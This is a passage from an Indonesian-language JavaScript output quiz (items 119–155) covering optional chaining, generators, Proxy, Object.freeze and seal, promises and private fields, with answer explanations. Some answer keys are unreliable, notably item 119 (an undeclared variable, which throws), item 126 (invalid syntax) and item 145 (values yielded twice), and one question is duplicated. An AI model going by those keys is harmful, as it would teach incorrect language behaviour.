<details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With the `+=` operand, we're incrementing the value of `num` by `1`. `num` had the initial value `1`, so `1 + 1` is `2`. The item on the second index in the `list` array is 🥰, `console.log(list[2])` prints 🥰. </p> </details> --- ###### 119. Apa yang akan tampil? ```javascript const person = { firstName: 'Lydia', lastName: 'Hallie', pet: { name: 'Mara', breed: 'Dutch Tulip Hound', }, getFullName() { return `${this.firstName} ${this.lastName}`; }, }; console.log(person.pet?.name); console.log(person.pet?.family?.name); console.log(person.getFullName?.()); console.log(member.getLastName?.()); ``` - A: `undefined` `undefined` `undefined` `undefined` - B: `Mara` `undefined` `Lydia Hallie` `undefined` - C: `Mara` `null` `Lydia Hallie` `null` - D: `null` `ReferenceError` `null` `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With the optional chaining operator `?.`, we no longer have to explicitly check whether the deeper nested values are valid or not. If we're trying to access a property on an `undefined` or `null` value (_nullish_), the expression short-circuits and returns `undefined`. `person.pet?.name`: `person` has a property named `pet`: `person.pet` is not nullish. It has a property called `name`, and returns `Mara`. `person.pet?.family?.name`: `person` has a property named `pet`: `person.pet` is not nullish. `pet` does _not_ have a property called `family`, `person.pet.family` is nullish. The expression returns `undefined`. `person.getFullName?.()`: `person` has a property named `getFullName`: `person.getFullName()` is not nullish and can get invoked, which returns `Lydia Hallie`. `member.getLastName?.()`: `member` is not defined: `member.getLastName()` is nullish. The expression returns `undefined`. </p> </details> --- ###### 120. Apa yang akan tampil? ```javascript const groceries = ['banana', 'apple', 'peanuts']; if (groceries.indexOf('banana')) { console.log('We have to buy bananas!'); } else { console.log(`We don't have to buy bananas!`); } ``` - A: We have to buy bananas! - B: We don't have to buy bananas - C: `undefined` - D: `1` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B We passed the condition `groceries.indexOf("banana")` to the if-statement. `groceries.indexOf("banana")` returns `0`, which is a falsy value. Since the condition in the if-statement is falsy, the code in the `else` block runs, and `We don't have to buy bananas!` gets logged. </p> </details> --- ###### 121. Apa yang akan tampil? ```javascript const config = { languages: [], set language(lang) { return this.languages.push(lang); }, }; console.log(config.language); ``` - A: `function language(lang) { this.languages.push(lang }` - B: `0` - C: `[]` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D The `language` method is a `setter`. Setters don't hold an actual value, their purpose is to _modify_ properties. When calling a `setter` method, `undefined` gets returned. </p> </details> --- ###### 122. Apa yang akan tampil? ```javascript const name = 'Lydia Hallie'; console.log(!typeof name === 'object'); console.log(!typeof name === 'string'); ``` - A: `false` `true` - B: `true` `false` - C: `false` `false` - D: `true` `true` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C `typeof name` returns `"string"`. The string `"string"` is a truthy value, so `!typeof name` returns the boolean value `false`. `false === "object"` and `false === "string"` both return`false`. (If we wanted to check whether the type was (un)equal to a certain type, we should've written `!==` instead of `!typeof`) </p> </details> --- ###### 123. Apa yang akan tampil? ```javascript const add = x => y => z => { console.log(x, y, z); return x + y + z; }; add(4)(5)(6); ``` - A: `4` `5` `6` - B: `6` `5` `4` - C: `4` `function` `function` - D: `undefined` `undefined` `6` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A The `add` function returns an arrow function, which returns an arrow function, which returns an arrow function (still with me?). The first function receives an argument `x` with the value of `4`. We invoke the second function, which receives an argument `y` with the value `5`. Then we invoke the third function, which receives an argument `z` with the value `6`. When we're trying to access the value `x`, `y` and `z` within the last arrow function, the JS engine goes up the scope chain in order to find the values for `x` and `y` accordingly. This returns `4` `5` `6`. </p> </details> --- ###### 124. Apa yang akan tampil? ```javascript async function* range(start, end) { for (let i = start; i <= end; i++) { yield Promise.resolve(i); } } (async () => { const gen = range(1, 3); for await (const item of gen) { console.log(item); } })(); ``` - A: `Promise {1}` `Promise {2}` `Promise {3}` - B: `Promise {<pending>}` `Promise {<pending>}` `Promise {<pending>}` - C: `1` `2` `3` - D: `undefined` `undefined` `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The generator function `range` returns an async object with promises for each item in the range we pass: `Promise{1}`, `Promise{2}`, `Promise{3}`. We set the variable `gen` equal to the async object, after which we loop over it using a `for await ... of` loop. We set the variable `item` equal to the returned Promise values: first `Promise{1}`, then `Promise{2}`, then `Promise{3}`. Since we're _awaiting_ the value of `item`, the resolved promsie, the resolved _values_ of the promises get returned: `1`, `2`, then `3`. </p> </details> --- ###### 125. Apa yang akan tampil? ```javascript const myFunc = ({ x, y, z }) => { console.log(x, y, z); }; myFunc(1, 2, 3); ``` - A: `1` `2` `3` - B: `{1: 1}` `{2: 2}` `{3: 3}` - C: `{ 1: undefined }` `undefined` `undefined` - D: `undefined` `undefined` `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D `myFunc` expects an object with properties `x`, `y` and `z` as its argument. Since we're only passing three separate numeric values (1, 2, 3) instead of one object with properties `x`, `y` and `z` ({x: 1, y: 2, z: 3}), `x`, `y` and `z` have their default value of `undefined`. </p> </details> --- ###### 126. Apa yang akan tampil? ```javascript function getFine(speed, amount) { const formattedSpeed = new Intl.NumberFormat({ 'en-US', { style: 'unit', unit: 'mile-per-hour' } }).format(speed) const formattedAmount = new Intl.NumberFormat({ 'en-US', { style: 'currency', currency: 'USD' } }).format(amount) return `The driver drove ${formattedSpeed} and has to pay ${formattedAmount}` } console.log(getFine(130, 300)) ``` - A: The driver drove 130 and has to pay 300 - B: The driver drove 130 mph and has to pay \$300.00 - C: The driver drove undefined and has to pay undefined - D: The driver drove 130.00 and has to pay 300.00 <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With the `Intl.NumberFormat` method, we can format numeric values to any locale. We format the numeric value `130` to the `en-US` locale as a `unit` in `mile-per-hour`, which results in `130 mph`. The numeric value `300` to the `en-US` locale as a `currentcy` in `USD` results in `$300.00`. </p> </details> --- ###### 127. Apa yang akan tampil? ```javascript const spookyItems = ['👻', '🎃', '🕸']; ({ item: spookyItems[3] } = { item: '💀' }); console.log(spookyItems); ``` - A: `["👻", "🎃", "🕸"]` - B: `["👻", "🎃", "🕸", "💀"]` - C: `["👻", "🎃", "🕸", { item: "💀" }]` - D: `["👻", "🎃", "🕸", "[object Object]"]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B By destructuring objects, we can unpack values from the right-hand object, and assign the unpacked value to the value of the same property name on the left-hand object. In this case, we're assigning the value "💀" to `spookyItems[3]`. This means that we're modifying the `spookyItems` array, we're adding the "💀" to it. When logging `spookyItems`, `["👻", "🎃", "🕸", "💀"]` gets logged. </p> </details> --- ###### 128. Apa yang akan tampil? ```javascript const name = 'Lydia Hallie'; const age = 21; console.log(Number.isNaN(name)); console.log(Number.isNaN(age)); console.log(isNaN(name)); console.log(isNaN(age)); ``` - A: `true` `false` `true` `false` - B: `true` `false` `false` `false` - C: `false` `false` `true` `false` - D: `false` `true` `false` `true` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With the `Number.isNaN` method, you can check if the value you pass is a _numeric value_ and equal to `NaN`. `name` is not a numeric value, so `Number.isNaN(name)` returns `false`. `age` is a numeric value, but is not equal to `NaN`, so `Number.isNaN(age)` returns `false`. With the `isNaN` method, you can check if the value you pass is not a number. `name` is not a number, so `isNaN(name)` returns true. `age` is a number, so `isNaN(age)` returns `false`. </p> </details> --- ###### 129. Apa yang akan tampil? ```javascript const randomValue = 21; function getInfo() { console.log(typeof randomValue); const randomValue = 'Lydia Hallie'; } getInfo(); ``` - A: `"number"` - B: `"string"` - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Variables declared with the `const` keyword are not referencable before their initialization: this is called the _temporal dead zone_. In the `getInfo` function, the variable `randomValue` is scoped in the functional scope of `getInfo`. On the line where we want to log the value of `typeof randomValue`, the variable `randomValue` isn't initialized yet: a `ReferenceError` gets thrown! The engine didn't go down the scope chain since we declared the variable `randomValue` in the `getInfo` function. </p> </details> --- ###### 130. Apa yang akan tampil? ```javascript const myPromise = Promise.resolve('Woah some cool data'); (async () => { try { console.log(await myPromise); } catch { throw new Error(`Oops didn't work`); } finally { console.log('Oh finally!'); } })(); ``` - A: `Woah some cool data` - B: `Oh finally!` - C: `Woah some cool data` `Oh finally!` - D: `Oops didn't work` `Oh finally!` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C In the `try` block, we're logging the awaited value of the `myPromise` variable: `"Woah some cool data"`. Since no errors were thrown in the `try` block, the code in the `catch` block doesn't run. The code in the `finally` block _always_ runs, `"Oh finally!"` gets logged. </p> </details> --- ###### 131. Apa yang akan tampil? ```javascript const emojis = ['🥑', ['✨', '✨', ['🍕', '🍕']]]; console.log(emojis.flat(1)); ``` - A: `['🥑', ['✨', '✨', ['🍕', '🍕']]]` - B: `['🥑', '✨', '✨', ['🍕', '🍕']]` - C: `['🥑', ['✨', '✨', '🍕', '🍕']]` - D: `['🥑', '✨', '✨', '🍕', '🍕']` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With the `flat` method, we can create a new, flattened array. The depth of the flattened array depends on the value that we pass. In this case, we passed the value `1` (which we didn't have to, that's the default value), meaning that only the arrays on the first depth will be concatenated. `['🥑']` and `['✨', '✨', ['🍕', '🍕']]` in this case. Concatenating these two arrays results in `['🥑', '✨', '✨', ['🍕', '🍕']]`. </p> </details> --- ###### <a name=20191224></a>132. Apa yang akan tampil? ```javascript class Counter { constructor() { this.count = 0; } increment() { this.count++; } } const counterOne = new Counter(); counterOne.increment(); counterOne.increment(); const counterTwo = counterOne; counterTwo.increment(); console.log(counterOne.count); ``` - A: `0` - B: `1` - C: `2` - D: `3` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D `counterOne` is an instance of the `Counter` class. The counter class contains a `count` property on its constructor, and an `increment` method. First, we invoked the `increment` method twice by calling `counterOne.increment()`. Currently, `counterOne.count` is `2`. <img src="https://i.imgur.com/KxLlTm9.png" width="400"> Then, we create a new variable `counterTwo`, and set it equal to `counterOne`. Since objects interact by reference, we're just creating a new reference to the same spot in memory that `counterOne` points to. Since it has the same spot in memory, any changes made to the object that `counterTwo` has a reference to, also apply to `counterOne`. Currently, `counterTwo.count` is `2`. We invoke the `counterTwo.increment()`, which sets the `count` to `3`. Then, we log the count on `counterOne`, which logs `3`. <img src="https://i.imgur.com/BNBHXmc.png" width="400"> </p> </details> --- ###### 133. Apa yang akan tampil? ```javascript const myPromise = Promise.resolve(Promise.resolve('Promise!')); function funcOne() { myPromise.then(res => res).then(res => console.log(res)); setTimeout(() => console.log('Timeout!', 0)); console.log('Last line!'); } async function funcTwo() { const res = await myPromise; console.log(await res); setTimeout(() => console.log('Timeout!', 0)); console.log('Last line!'); } funcOne(); funcTwo(); ``` - A: `Promise! Last line! Promise! Last line! Last line! Promise!` - B: `Last line! Timeout! Promise! Last line! Timeout! Promise!` - C: `Promise! Last line! Last line! Promise! Timeout! Timeout!` - D: `Last line! Promise! Promise! Last line! Timeout! Timeout!` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D First, we invoke `funcOne`. On the first line of `funcOne`, we call the `myPromise` promise, which is an _asynchronous_ operation. While the engine is busy completing the promise, it keeps on running the function `funcOne`. The next line is the _asynchronous_ `setTimeout` function, from which the callback is sent to the Web API. (see my article on the event loop here.) Both the promise and the timeout are asynchronous operations, the function keeps on running while it's busy completing the promise and handling the `setTimeout` callback. This means that `Last line!` gets logged first, since this is not an asynchonous operation. This is the last line of `funcOne`, the promise resolved, and `Promise!` gets logged. However, since we're invoking `funcTwo()`, the call stack isn't empty, and the callback of the `setTimeout` function cannot get added to the callstack yet. In `funcTwo` we're, first _awaiting_ the myPromise promise. With the `await` keyword, we pause the execution of the function until the promise has resolved (or rejected). Then, we log the awaited value of `res` (since the promise itself returns a promise). This logs `Promise!`. The next line is the _asynchronous_ `setTimeout` function, from which the callback is sent to the Web API. We get to the last line of `funcTwo`, which logs `Last line!` to the console. Now, since `funcTwo` popped off the call stack, the call stack is empty. The callbacks waiting in the queue (`() => console.log("Timeout!")` from `funcOne`, and `() => console.log("Timeout!")` from `funcTwo`) get added to the call stack one by one. The first callback logs `Timeout!`, and gets popped off the stack. Then, the second callback logs `Timeout!`, and gets popped off the stack. This logs `Last line! Promise! Promise! Last line! Timeout! Timeout!` </p> </details> --- ###### 134. How can we invoke `sum` in `index.js` from `sum.js?` ```javascript // sum.js export default function sum(x) { return x + x; } // index.js import * as sum from './sum'; ``` - A: `sum(4)` - B: `sum.sum(4)` - C: `sum.default(4)` - D: Default aren't imported with `*`, only named exports <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With the asterisk `*`, we import all exported values from that file, both default and named. If we had the following file: ```javascript // info.js export const name = 'Lydia'; export const age = 21; export default 'I love JavaScript'; // index.js import * as info from './info'; console.log(info); ``` The following would get logged: ```javascript { default: "I love JavaScript", name: "Lydia", age: 21 } ``` For the `sum` example, it means that the imported value `sum` looks like this: ```javascript { default: function sum(x) { return x + x } } ``` We can invoke this function, by calling `sum.default` </p> </details> --- ###### 135. Apa yang akan tampil? ```javascript const handler = { set: () => console.log('Added a new property!'), get: () => console.log('Accessed a property!'), }; const person = new Proxy({}, handler); person.name = 'Lydia'; person.name; ``` - A: `Added a new property!` - B: `Accessed a property!` - C: `Added a new property!` `Accessed a property!` - D: Nothing gets logged <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With a Proxy object, we can add custom behavior to an object that we pass to it as the second argument. In tis case, we pass the `handler` object which contained to properties: `set` and `get`. `set` gets invoked whenever we _set_ property values, `get` gets invoked whenever we _get_ (access) property values. The first argument is an empty object `{}`, which is the value of `person`. To this object, the custom behavior specified in the `handler` object gets added. If we add a property to the `person` object, `set` will get invoked. If we access a property on the `person` object, `get` gets invoked. First, we added a new property `name` to the proxy object (`person.name = "Lydia"`). `set` gets invoked, and logs `"Added a new property!"`. Then, we access a property value on the proxy object, the `get` property on the handler object got invoked. `"Accessed a property!"` gets logged. </p> </details> --- ###### 136. Which of the following will modify the `person` object? ```javascript const person = { name: 'Lydia Hallie' }; Object.seal(person); ``` - A: `person.name = "Evan Bacon"` - B: `person.age = 21` - C: `delete person.name` - D: `Object.assign(person, { age: 21 })` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A With `Object.seal` we can prevent new properies from being _added_, or existing properties to be _removed_. However, you can still modify the value of existing properties. </p> </details> --- ###### 137. Which of the following will modify the `person` object? ```javascript const person = { name: 'Lydia Hallie', address: { street: '100 Main St', }, }; Object.freeze(person); ``` - A: `person.name = "Evan Bacon"` - B: `delete person.address` - C: `person.address.street = "101 Main St"` - D: `person.pet = { name: "Mara" }` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The `Object.freeze` method _freezes_ an object. No properties can be added, modified, or removed. However, it only _shallowly_ freezes the object, meaning that only _direct_ properties on the object are frozen. If the property is another object, like `address` in this case, the properties on that object aren't frozen, and can be modified. </p> </details> --- ###### 138. Which of the following will modify the `person` object? ```javascript const person = { name: 'Lydia Hallie', address: { street: '100 Main St', }, }; Object.freeze(person); ``` - A: `person.name = "Evan Bacon"` - B: `delete person.address` - C: `person.address.street = "101 Main St"` - D: `person.pet = { name: "Mara" }` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The `Object.freeze` method _freezes_ an object. No properties can be added, modified, or removed. However, it only _shallowly_ freezes the object, meaning that only _direct_ properties on the object are frozen. If the property is another object, like `address` in this case, the properties on that object aren't frozen, and can be modified. </p> </details> --- ###### 139. Apa yang akan tampil? ```javascript const add = x => x + x; function myFunc(num = 2, value = add(num)) { console.log(num, value); } myFunc(); myFunc(3); ``` - A: `2` `4` dan `3` `6` - B: `2` `NaN` dan `3` `NaN` - C: `2` `Error` dan `3` `6` - D: `2` `4` dan `3` `Error` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A First, we invoked `myFunc()` without passing any arguments. Since we didn't pass arguments, `num` and `value` got their default values: num is `2`, and `value` the returned value of the function `add`. To the `add` function, we pass `num` as an argument, which had the value of `2`. `add` returns `4`, which is the value of `value`. Then, we invoked `myFunc(3)` and passed the value `3` as the value for the argument `num`. We didn't pass an argument for `value`. Since we didn't pass a value for the `value` argument, it got the default value: the returned value of the `add` function. To `add`, we pass `num`, which has the value of `3`. `add` returns `6`, which is the value of `value`. </p> </details> --- ###### 140. Apa yang akan tampil? ```javascript class Counter { #number = 10 increment() { this.#number++ } getNum() { return this.#number } } const counter = new Counter() counter.increment() console.log(counter.#number) ``` - A: `10` - B: `11` - C: `undefined` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D In ES2020, we can add private variables in classes by using the `#`. We cannot access these variables outside of the class. When we try to log `counter.#number`, a SyntaxError gets thrown: we cannot acccess it outside the `Counter` class! </p> </details> --- ###### 141. Apa yang akan tampil? ```javascript const teams = [ { name: 'Team 1', members: ['Paul', 'Lisa'] }, { name: 'Team 2', members: ['Laura', 'Tim'] }, ]; function* getMembers(members) { for (let i = 0; i < members.length; i++) { yield members[i]; } } function* getTeams(teams) { for (let i = 0; i < teams.length; i++) { // ✨ SOMETHING IS MISSING HERE ✨ } } const obj = getTeams(teams); obj.next(); // { value: "Paul", done: false } obj.next(); // { value: "Lisa", done: false } ``` - A: `yield getMembers(teams[i].members)` - B: `yield* getMembers(teams[i].members)` - C: `return getMembers(teams[i].members)` - D: `return yield getMembers(teams[i].members)` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Untuk melakukan pengulangan pada `members` dalam setiap elemen array `tim`, kita perlu melemparkan `tim[i].members` ke fungsi generator `getMembers`. Fungsi generator akan mengembalikan objek hasil generator. Untuk mengulang setiap elemen dalam objek generator ini, kita perlu menggunakan `yield*`. Jika kita telah menulis `yield`, `return yield`, atau `return`, maka seluruh fungsi generator akan dikembalikan saat pertama kali kita memanggil metode `next`. </p> </details> --- ###### 142. Apa yang akan tampil? ```javascript const person = { name: 'Lydia Hallie', hobbies: ['coding'], }; function addHobby(hobby, hobbies = person.hobbies) { hobbies.push(hobby); return hobbies; } addHobby('running', []); addHobby('dancing'); addHobby('baking', person.hobbies); console.log(person.hobbies); ``` - A: `["coding"]` - B: `["coding", "dancing"]` - C: `["coding", "dancing", "baking"]` - D: `["coding", "running", "dancing", "baking"]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The `addHobby` function receives two arguments, `hobby` and `hobbies` with the default value of the `hobbies` array on the `person` object. First, we invoke the `addHobby` function, and pass `"running"` as the value for `hobby` and an empty array as the value for `hobbies`. Since we pass an empty array as the value for `hobbies`, `"running"` gets added to this empty array. Then, we invoke the `addHobby` function, and pass `"dancing"` as the value for `hobby`. We didn't pass a value for `hobbies`, so it gets the default value, the `hobbies` property on the `person` object. We push the hobby `dancing` to the `person.hobbies` array. Last, we invoke the `addHobby` function, and pass `"bdaking"` as the value for `hobby`, and the `person.hobbies` array as the value for `hobbies`. We push the hobby `baking` to the `person.hobbies` array. After pushing `dancing` and `baking`, the value of `person.hobbies` is `["coding", "dancing", "baking"]` </p> </details> --- ###### 143. Apa yang akan tampil? ```javascript class Bird { constructor() { console.log("I'm a bird. 🦢"); } } class Flamingo extends Bird { constructor() { console.log("I'm pink. 🌸"); super(); } } const pet = new Flamingo(); ``` - A: `I'm pink. 🌸` - B: `I'm pink. 🌸` `I'm a bird. 🦢` - C: `I'm a bird. 🦢` `I'm pink. 🌸` - D: Nothing, we didn't call any method <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Kita membuat variabel `pet` yang merupakan turunan dari class `Flamingo`. Saat kita membuat turunan, `constructor` pada `Flamingo` dipanggil. Pertama, `"I'm pink. 🌸"` ditampilkan, setelah itu kita memanggil `super()`. `super()` memanggil konstruktor class induk, `Bird`. Constructor pada `Bird` dipanggil, dan menampilkan `"I'm a bird. 🦢"`. </p> </details> --- ###### 144. Manakah dari pilihan di bawah ini yang salah? ```javascript const emojis = ['🎄', '🎅🏼', '🎁', '⭐']; /* 1 */ emojis.push('🦌'); /* 2 */ emojis.splice(0, 2); /* 3 */ emojis = [...emojis, '🥂']; /* 4 */ emojis.length = 0; ``` - A: 1 - B: 1 dan 2 - C: 3 dan 4 - D: 3 <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Deklarasi `const` pada dasarnya berarti tidak dapat _mengubah_ nilai dari variable tersebut, karena bersifat _read-only (tidak dapat diubah)_. Bagaimanapun, nilainya tidak mutlak. Seperti array pada variable `emojis` dimana nilainya bisa diubah, contohnya untuk menambah nilai array baru, menghilangkan, atau mengubah properti `length` dari array menjadi 0. </p> </details> --- ###### 145. Apa yang harus kita tambahkan ke objek `person` untuk mendapatkan `["Lydia Hallie", 21]` sebagai output dari `[...person]`? ```javascript const person = { name: "Lydia Hallie", age: 21 } [...person] // ["Lydia Hallie", 21] ``` - A: Tidak ada, objek adalah iterable secara default - B: `*[Symbol.iterator]() { for (let x in this) yield* this[x] }` - C: `*[Symbol.iterator]() { for (let x in this) yield* Object.values(this) }` - D: `*[Symbol.iterator]() { for (let x in this) yield this }` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Objek tidak dapat diulang secara default. Sebuah iterable adalah sebuah iterable jika protokol iterator ada. Kita dapat menambahkan ini secara manual dengan menambahkan simbol iterator `[Symbol.iterator]`, dimana harus mengembalikan objek generator, sebagai contoh dengan membuat fungsi generator `*[Symbol.iterator]() {}`. Fungsi generator ini harus menghasilkan `Object.values` dari objek `person` jika kita mau mengembalikan array `["Lydia Hallie", 21]`: `yield* Object.values(this)`. </p> </details> --- ###### 146. Apa yang akan tampil? ```javascript let count = 0; const nums = [0, 1, 2, 3]; nums.forEach(num => { if (num) count += 1 }) console.log(count) ``` - A: 1 - B: 2 - C: 3 - D: 4 <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Pernyataan `if` didalam perulangan `forEach` akan mengecek apakah nilai dari `num` benar atau salah. Sejak nilai pertama dari array `nums` adalah `0`, yang merupakan nilai salah, pernyataan `if` tidak akan dieksekusi. maka `count` yang mendapat increment hanya untuk 3 nomor yang lain di array `nums`, `1`, `2` dan `3`. sejak `count` mendapat increment `1` 3 kali, maka nilai dari `count` adalah `3`. </p> </details> --- ###### 147. Apa hasilnya? ```javascript class Calc { constructor() { this.count = 0 } increase() { this.count ++ } } const calc = new Calc() new Calc().increase() console.log(calc.count) ``` - A: `0` - B: `1` - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Kami mengatur variabel `calc` sama dengan instance baru dari class `Calc`. Kemudian, kami membuat instance baru dari `Calc`, dan memanggil metode `increase` pada contoh ini. Karena properti count berada dalam konstruktor dari class `Calc`, properti count tidak dibagikan pada prototipe `Calc`. Ini berarti bahwa nilai hitungan belum diperbarui untuk contoh yang ditunjukkan kalk, hitung masih `0`. </p> </details> --- ###### 148. Apa hasilnya? ```javascript const user = { email: "e@mail.com", password: "12345" } const updateUser = ({ email, password }) => { if (email) { Object.assign(user, { email }) } if (password) { user.password = password } return user } const updatedUser = updateUser({ email: "new@email.com" }) console.log(updatedUser === user) ``` - A: `false` - B: `true` - C: `TypeError` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Fungsi `updateUser` memperbarui nilai properti `email` dan `password` pada pengguna, jika nilainya diteruskan ke fungsi, setelah itu fungsi mengembalikan objek `user`. Nilai yang dikembalikan dari fungsi `updateUser` adalah objek `user`, yang berarti bahwa nilai updatedUser adalah referensi ke objek `user` yang sama dengan yang ditunjuk oleh `user`. `updatedUser === user` sama dengan `true`. </p> </details> --- ###### 149. Apa hasilnya? ```javascript const fruit = ['🍌', '🍊', '🍎'] fruit.slice(0, 1) fruit.splice(0, 1) fruit.unshift('🍇') ``` - A: `['🍌', '🍊', '🍎']` - B: `['🍊', '🍎']` - C: `['🍇', '🍊', '🍎']` - D: `['🍇', '🍌', '🍊', '🍎']` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Pertama, kita memanggil metode `slice` pada array fruit. Metode slice tidak mengubah array asli, tetapi mengembalikan nilai yang dipotongnya dari array: banana emoji. Kemudian, kita memanggil metode `splice` pada array fruit. Metode splice memang mengubah array asli, yang berarti array fruit sekarang terdiri dari `['🍊', '🍎']`. Akhirnya, kita memanggil metode `unshift` pada array `fruit`, yang memodifikasi array asli dengan menambahkan nilai yang diberikan, ‘🍇’ dalam hal ini, sebagai elemen pertama dalam array. Susunan fruit sekarang terdiri dari `['🍇', '🍊', '🍎']`. </p> </details> --- ###### 150. Apa hasilnya? ```javascript const animals = {}; let dog = { emoji: '🐶' } let cat = { emoji: '🐈' } animals[dog] = { ...dog, name: "Mara" } animals[cat] = { ...cat, name: "Sara" } console.log(animals[dog]) ``` - A: `{ emoji: "🐶", name: "Mara" }` - B: `{ emoji: "🐈", name: "Sara" }` - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Kunci objek diubah menjadi string. Karena nilai `dog` adalah sebuah objek, `animals[dog]`sebenarnya berarti kita membuat properti baru bernama `"object Object"`yang sama dengan objek baru. `animals["object Object"]` sekarang sama dengan `{ emoji: "🐶", name: "Mara"}`. `cat` juga merupakan objek, yang berarti bahwa `animals[cat]` sebenarnya berarti bahwa kami menimpa nilai `animals[``"``object Object``"``]` dengan properti cat yang baru. Mencatat `animals[dog]`, atau sebenarnya `animals["object Object"]` karena mengonversi objek `dog` menjadi string menghasilkan `"object Object"`, mengembalikan `{emoji: "🐈", nama: "Sara"}`. </p> </details> --- ###### 151. Apa hasilnya? ```javascript const user = { email: "my@email.com", updateEmail: (email) => { this.email = email; }, }; user.updateEmail("new@email.com"); console.log(user.email); ``` - A: `my@email.com` - B: `new@email.com` - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Fungsi `updateEmail` adalah fungsi panah, dan tidak terikat ke objek `user`. Artinya, kata kunci `this` tidak merujuk ke objek `user`, tetapi merujuk pada cakupan global dalam kasus ini. Nilai `email` dalam objek `user` tidak diperbarui. Saat memasukkan nilai `user.email`, nilai asli `my@email.com` akan dikembalikan. </p> </details> --- ###### 152. Apa hasilnya? ```javascript const promise1 = Promise.resolve('First') const promise2 = Promise.resolve('Second') const promise3 = Promise.reject('Third') const promise4 = Promise.resolve('Fourth') const runPromises = async () => { const res1 = await Promise.all([promise1, promise2]); const res2 = await Promise.all([promise3, promise4]); return [res1, res2]; } runPromises() .then(res => console.log(res)) .catch(err => console.log(err)) ``` - A: `[['First', 'Second'], ['Fourth']]` - B: `[['First', 'Second'], ['Third', 'Fourth']]` - C: `[['First', 'Second']]` - D: `'Third'` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Metode `Promise.all` menjalankan promise yang diberikan secara paralel. Jika satu promise gagal, metode `Promise.all` dengan nilai promise yang ditolak. Dalam kasus ini, `promise3` ditolak dengan nilai `"Third"`. Kami menangkap nilai yang ditolak dalam metode `catch` yang dirantai pada pemanggilan `runPromises` untuk menangkap setiap kesalahan dalam fungsi `runPromises`. Hanya `"Third"` yang dicatat, karena `promise3` ditolak dengan nilai ini. </p> </details> --- ###### 153.Berapa nilai `method` untuk mencatat `{name: "Lydia", age: 22}`? ```javascript const keys = ["name", "age"]; const values = ["Lydia", 22]; const method = /* ?? */ Object[method]( keys.map((_, i) => { return [keys[i], values[i]]; }) ); // { name: "Lydia", age: 22 } ``` - A: `entries` - B: `values` - C: `fromEntries` - D: `forEach` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Metode `fromEntries` mengubah array 2d menjadi objek. Elemen pertama di setiap subarray akan menjadi kuncinya, dan elemen kedua di setiap subarray akan menjadi nilainya. Dalam hal ini, kami memetakan di atas array `keys`, yang mengembalikan array yang elemen pertamanya adalah item pada array kunci pada indeks saat ini, dan elemen kedua adalah item dari array nilai pada indeks saat ini. Ini membuat array subarray yang berisi kunci dan nilai yang benar, yang menghasilkan `{name:" Lydia ", age: 22}` </p> </details> --- ###### 154. Apa hasilnya? ```javascript const createMember = ({ email, address = {}}) => { const validEmail = /.+\@.+\..+/.test(email) if (!validEmail) throw new Error("Valid email pls") return { email, address: address ? address : null } } const member = createMember({ email: "my@email.com" }) console.log(member) ``` - A: `{ email: "my@email.com", address: null }` - B: `{ email: "my@email.com" }` - C: `{ email: "my@email.com", address: {} }` - D: `{ email: "my@email.com", address: undefined }` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Nilai default dari `address` adalah objek kosong `{}`. Saat kita menyetel variabel `member` sama dengan objek yang dikembalikan oleh fungsi `createMember`, kita tidak meneruskan nilai untuk address, yang berarti bahwa nilai address adalah objek kosong default `{}`.Objek kosong adalah nilai sebenarnya, yang berarti kondisi `address ? address: null` mengembalikan `true`. Nilai address adalah objek kosong `{}`. </p> </details> --- ###### 155. Apa hasilnya? ```javascript let randomValue = { name: "Lydia" } randomValue = 23 if (!typeof randomValue === "string") { console.log("It's not a string!") } else { console.log("Yay it's a string!") } ``` - A: `It's not a string!` - B: `Yay it's a string!` - C: `TypeError` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Kondisi dalam pernyataan `if` memeriksa apakah nilai dari `!typeof randomValue` sama dengan `"string"`. Operator `!` Mengonversi nilai menjadi nilai boolean. Jika nilainya benar, nilai yang dikembalikan akan menjadi `false`, jika nilainya salah, nilai yang dikembalikan akan menjadi `true`. Dalam kasus ini, nilai yang dikembalikan dari `typeof randomValue` adalah nilai sebenarnya `"string"`, artinya nilai `!typeof randomValue` adalah nilai boolean `false`. `!typeof randomValue === "string"` selalu mengembalikan false, karena kita sebenarnya memeriksa `false === "string "`. Karena kondisi mengembalikan `false`, blok kode dari 